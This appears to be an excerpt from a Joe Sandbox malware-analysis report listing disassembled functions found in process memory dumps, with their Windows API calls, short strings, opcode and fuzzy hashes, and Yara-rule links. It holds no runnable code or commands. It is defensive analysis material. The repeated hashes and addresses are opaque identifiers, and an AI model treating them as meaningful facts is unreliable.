Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 81eb4067b28fa6764028a4f3b9c2f959109b6e1822d1ce60e4b6655deb49aaba
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 66519D721097838BEB64AF15A4843AD77A2F354BE5F1C4276DA8947B95CB38D473CB00

Function 000001F91B35A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F91B35A1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000001F91B35A288

Strings

csm, xrefs: 000001F91B35A1C2
csm, xrefs: 000001F91B35A2DA

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 9b8711b564d2480774510e7dc0b39a9441bf00a66202087ed0e3730fc3d32f24
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 38519E3210A387CAEB64AF1594443B877A2F355BA8F1C4235DA8987BD5CB38D5B3D700

Function 000001F91B2F8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F91B2F8413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F91B2F84A8

Strings

csm, xrefs: 000001F91B2F848E
f, xrefs: 000001F91B2F8426

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: c35cb26e0b21132ee2998a1d99445de07d117c1679c1f8fef2b51c4f42bdae36
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 8E51C572719623C7FB14EF15D444BB8B796F360BA4F1A8838DB064B788E7B4C8498704

Function 000001F91B358405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F91B358413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F91B3584A8

Strings

f, xrefs: 000001F91B358426
csm, xrefs: 000001F91B35848E

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: d093ce1da2e10dfd717a9a01a741d8e80cbdf835df98257e3b912a5c5330a68f
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: CB51B03270B6038AEB18EF15E444BB93796F354BA8F598934DE4643788FB34D9528704

Function 00007FF727267530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF72726324C,?,?,00007FF727263964), ref: 00007FF727267642

Strings

%s%c, xrefs: 00007FF7272675B4
%.*s, xrefs: 00007FF7272675FB
\, xrefs: 00007FF7272675A7

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction ID: 13b4df71dea0b0b01148c43b74d948b8f430e1085f3089ed1a933ade3abd738e
Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction Fuzzy Hash: B231DE21619AC245E621AB15FD107A6A2F4EF45BD0F94823AED6D437C9DF3CD2068F10

Function 000001F91B2F83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F91B2F8413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F91B2F84A8

Strings

csm, xrefs: 000001F91B2F848E
f, xrefs: 000001F91B2F8426

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: a54769ca1c0aef372d04f8e789942731e875b475b9b2042516fb72d8ed608d2d
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 4F31AF31619653C7F714EF11E8447A9BBA6F750BA8F0A8838EF5A0B784DB78C945C704

Function 000001F91B3583E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001F91B358413
_IsNonwritableInCurrentImage.LIBCMT ref: 000001F91B3584A8

Strings

f, xrefs: 000001F91B358426
csm, xrefs: 000001F91B35848E

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: 03df114943d7301fa6048d1461e3662c70a2cdee109fa995b93ee52092ecf8a5
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: C831C37220A743D6EB18EF15E8447A977A6F340BE8F598434EE5B07784DB38D962C704

Function 00007FF727262870 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7272686B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF727263FA4,00000000,00007FF727261925), ref: 00007FF7272686E9

MessageBoxW.USER32 ref: 00007FF727262906
MessageBoxA.USER32 ref: 00007FF72726291A

Strings

Warning, xrefs: 00007FF7272628F7
Error/warning (ANSI fallback), xrefs: 00007FF72726290E

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: Error/warning (ANSI fallback)$Warning
API String ID: 1878133881-2698358428
Opcode ID: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction ID: 99eb08ceffcb51ac0182110be5fb27e87b3b5fa3e2e6f1794c8e6a41ff0651c4
Opcode Fuzzy Hash: bedc3c020f71ec751042cc21f49bee78fdd2451348ef76e59aa444c99166d18b
Instruction Fuzzy Hash: B311B272628B8581FB20AB00FA51BA9B3B4FF45B84FD0513ADA4C47654DF3DD606CB20

Function 000001F91B332058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001F91B3320D7
WriteFile.KERNEL32 ref: 000001F91B33239F
WriteFile.KERNEL32 ref: 000001F91B3323E5
GetLastError.KERNEL32 ref: 000001F91B33249B

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction ID: 6a56e3d6d38aa0333cee6ded37ba7a75a4fcd14287985450feeb7c526d20e8da
Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
Instruction Fuzzy Hash: 44D1E332B1AA8389E751DF69D8403ED3BB2F3547A8F184235DE5997BA9DA34C427C340

Function 00007FF72727B8B0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF72727B92F
WriteFile.KERNEL32 ref: 00007FF72727BBF7
WriteFile.KERNEL32 ref: 00007FF72727BC3D
GetLastError.KERNEL32 ref: 00007FF72727BCF3

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction ID: ed34fbfedbc5bac70d58af3bd0c7643cbe9e257fe04a7af1a21b4f82a256f5a2
Opcode Fuzzy Hash: ce0c3b3fbf9f468b37350500bd40f597e2424e9246c9b6d769e6af97d5ebe549
Instruction Fuzzy Hash: 02D11432B08A818DE710DF65DA402AC77B1FB46798B908235DE5E9BB99DF38D007CB14

Function 000001F91B3214A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001F91B3214C5
HeapFree.KERNEL32 ref: 000001F91B3214D4
GetProcessHeap.KERNEL32 ref: 000001F91B3214E1
HeapFree.KERNEL32 ref: 000001F91B3214F0
GetProcessHeap.KERNEL32 ref: 000001F91B321500

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: fccdced75e0e166058a65fb9f01cb5bc762ae8e924348a52df6b038ca287fb4d
Instruction ID: 1e4910203593d57a2ed629625fa9a83ff0a4a7c1c41f5c19a9568d7d1725d1cd
Opcode Fuzzy Hash: fccdced75e0e166058a65fb9f01cb5bc762ae8e924348a52df6b038ca287fb4d
Instruction Fuzzy Hash: B1117036A0EF93CAD714EF62E9042AA77A2F748F91F084035EE4903726DE38C0628740

Function 000001F91B332980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 000001F91B332A9C
GetLastError.KERNEL32 ref: 000001F91B332B27

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction ID: e89411505171faa4be9b72f0e5b9178855700962fba8596afe9641c645998275
Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
Instruction Fuzzy Hash: B091E77271965389F761AF6598503FE3BA2B704BA8F1C4139DE0A676A5DF38C4A3C700

Function 00007FF727262030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF727262064
SetWindowLongPtrW.USER32 ref: 00007FF727262086
GetWindowLongPtrW.USER32 ref: 00007FF7272620B0
InvalidateRect.USER32 ref: 00007FF7272620D0

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: d83835ef2792b73a3411d428ef2cebefbf41698aab357b9f6c7de222110577ff
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: BC11AC21E0815641F654B759EF4527A92F1EF96780FD4C036DE4947B9ACF3DD4C38920

Function 000001F91B327960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001F91B32798C
GetCurrentThreadId.KERNEL32 ref: 000001F91B32799A
GetCurrentProcessId.KERNEL32 ref: 000001F91B3279A6
QueryPerformanceCounter.KERNEL32 ref: 000001F91B3279B6

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction ID: d166fad219c498370d33535c3286f68aedebfd6c565bcfe88b8508f22de0eff6
Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
Instruction Fuzzy Hash: 0B112E32719F0389EF50DF61E8553B933A4F719768F480E31EA6D467A4DB78C1A98380

Function 000001F91B2F9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001F91B2F9EB7

Strings

RCC, xrefs: 000001F91B2F9E85
MOC, xrefs: 000001F91B2F9E7C

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 7ca02daffe6df188824013a58c94ec0fba667996be9341c2b57e91b0cf284314
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 6B618F33608B468AFB20EF65D4403ED77A2F354B98F08462AEF4917B98DB78D159C700

Function 000001F91B359E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001F91B359EB7

Strings

MOC, xrefs: 000001F91B359E7C
RCC, xrefs: 000001F91B359E85

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 6c207c118eaa9ea37c9c1115bb77ab4042cae56aa2f9e12482c9c1b8936f05e4
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: 9061823360AB868AEB10EF65D4403ED77A2F745B98F084235EF4917B99DB38D1A6C700

Function 000001F91B322330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001F91B322416
StrCpyW.SHLWAPI ref: 000001F91B32242D

Strings

\\.\pipe\, xrefs: 000001F91B322421

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction ID: 916c6da7a01c18f6df89dbd42da227c110096635ef86769ea7e630ba4f316eea
Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
Instruction Fuzzy Hash: 2951F83220E78381EA34AE29AC583FEA753F385BE0F5C4175DE4903B99CA39C526C740

Function 00007FF727284E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF727280A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF727280AA3

_get_daylight.LIBCMT ref: 00007FF727284F44
_get_daylight.LIBCMT ref: 00007FF727284F55

Strings

?, xrefs: 00007FF727284ED5

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction ID: 0cca318ac89b11bdf6904287a474e0fb0362b8414d5424606921d40e0fa0179e
Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction Fuzzy Hash: D5412812A1838243FB20AF259E01779D6F0EB92BA4F904239EE5C46AD5DF3DD4428F20

Function 00007FF72727F8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72727F916

Part of subcall function 00007FF72727E8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF72727E908

Strings

., xrefs: 00007FF72727F967
:, xrefs: 00007FF72727F956

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
Instruction ID: 319ce5c94a06daf16ee0decacdc1f3a83413e72ad79c44010f193b978c671169
Opcode Fuzzy Hash: 2ab34ab9cd3b86b5895dfaae9249a533cb2656d78b0c7701b1ac49f11c4a311a
Instruction Fuzzy Hash: D7414D22F0875298FB11EBA19F511FC66F4EF16758F940039DE4D6BA89EF3895438B20

Function 000001F91B3326F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001F91B332807
GetLastError.KERNEL32 ref: 000001F91B332829

Strings

U, xrefs: 000001F91B3327B3

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction ID: 68b1f3fa132f8d71f03269bf9b8fe6fe9b7592141c7719eb5a32f527e2a5efc3
Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
Instruction Fuzzy Hash: CE41933271AB8386DB20AF25E8453EA77A2F7987A4F584031EE4D87794DB3CD452CB40

Function 00007FF72727BF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF72727C05F
GetLastError.KERNEL32 ref: 00007FF72727C081

Strings

U, xrefs: 00007FF72727C00B

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction ID: d3303e5f1ca4b686bd698c87021a5c723964dc4472db9bbb43b77212fa2b04ed
Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction Fuzzy Hash: F641B622B1968581EB20DF25E9443A9B7F4FB49B94F944035EE4D87758EF3CD442CB50

Function 00007FF72727E8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF72727E908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF72727E95A

Strings

:, xrefs: 00007FF72727E91E

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
Instruction ID: d2eb2ee04d62133a97416d2c4aefc3d6ed56b2c4523126d74679c4bd2d751003
Opcode Fuzzy Hash: 42aabba90d01c53827fde20447a69e74228e2fd19b34bc9bc36161037011c97c
Instruction Fuzzy Hash: 2F21F223A08681C2EB60AB15DA4427DA3F1FB95B44FD54035CA8C4B284DF7CEA46CF70

Function 000001F91B3294A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001F91B3294F0
RaiseException.KERNEL32 ref: 000001F91B329531

Strings

csm, xrefs: 000001F91B32951E

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: 5f754d1f3b01070f0d34024edd0cd7e80fd683e0adbcbdc1ef605e751f9f7a45
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: 17111C32219B4282EB619F15E4443AA77E5F788BA4F594270EE8C07768DF38C562C700

Function 00007FF72726F068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF72726F0B8
RaiseException.KERNEL32 ref: 00007FF72726F0F9

Strings
